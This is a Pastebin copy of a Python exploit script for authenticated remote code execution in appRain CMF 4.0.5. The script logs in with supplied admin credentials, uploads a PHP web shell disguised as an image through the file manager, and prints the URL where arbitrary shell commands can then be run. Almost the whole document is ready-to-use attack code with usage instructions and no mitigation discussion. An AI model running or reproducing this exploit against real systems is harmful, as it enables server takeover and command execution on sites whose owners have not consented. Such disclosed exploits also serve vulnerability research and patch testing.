Advertisement
FlyFar

appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)

Jun 8th, 2024
430
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.12 KB | Cybersecurity | 0 0
  1. # Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)
  2. # Date: 04/28/2024
  3. # Exploit Author: Ahmet Ümit BAYRAM
  4. # Vendor Homepage: https://www.apprain.org
  5. # Software Link: https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip
  6. # Version: latest
  7. # Tested on: MacOS
  8.  
  9. import requests
  10. import sys
  11. import time
  12. import random
  13. import string
  14.  
  15. def generate_filename():
  16. """ Generate a 5-character random string for filename. """
  17. return ''.join(random.choices(string.ascii_lowercase, k=5)) + ".inc"
  18.  
  19. def login(site, username, password):
  20. print("Logging in...")
  21. time.sleep(2)
  22. login_url = f"https://{site}/admin/system"
  23. session = requests.Session()
  24. login_data = {
  25. 'data[Admin][admin_id]': username,
  26. 'data[Admin][admin_password]': password
  27. }
  28. headers = {
  29. 'Content-Type': 'application/x-www-form-urlencoded'
  30. }
  31. response = session.post(login_url, data=login_data, headers=headers)
  32. if "Logout" in response.text:
  33. print("Login Successful!")
  34. return session
  35. else:
  36. print("Login Failed!")
  37. sys.exit()
  38.  
  39. def upload_shell(session, site):
  40. print("Shell preparing...")
  41. time.sleep(2)
  42. filename = generate_filename()
  43. upload_url = f"https://{site}/admin/filemanager/upload"
  44. files = {
  45. 'data[filemanager][image]': (filename, "<html><body><form method='GET'
  46. name='<?php echo basename($_SERVER['PHP_SELF']); ?>'><input type='TEXT'
  47. name='cmd' autofocus id='cmd' size='80'><input type='SUBMIT'
  48. value='Execute'></form><pre><?php if(isset($_GET['cmd'])){
  49. system($_GET['cmd']); } ?></pre></body></html>", 'image/jpeg')
  50. }
  51. data = {
  52. 'submit': 'Upload'
  53. }
  54. response = session.post(upload_url, files=files, data=data)
  55. if response.status_code == 200 and "uploaded successfully" in response.text:
  56. print(f"Your Shell is Ready: https://{site}/uploads/filemanager/{filename}")
  57. else:
  58. print("Exploit Failed!")
  59. sys.exit()
  60.  
  61. if __name__ == "__main__":
  62. print("Exploiting...")
  63. time.sleep(2)
  64. if len(sys.argv) != 4:
  65. print("Usage: python exploit.py sitename.com username password")
  66. sys.exit()
  67. site = sys.argv[1]
  68. username = sys.argv[2]
  69. password = sys.argv[3]
  70. session = login(site, username, password)
  71. upload_shell(session, site)
  72.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement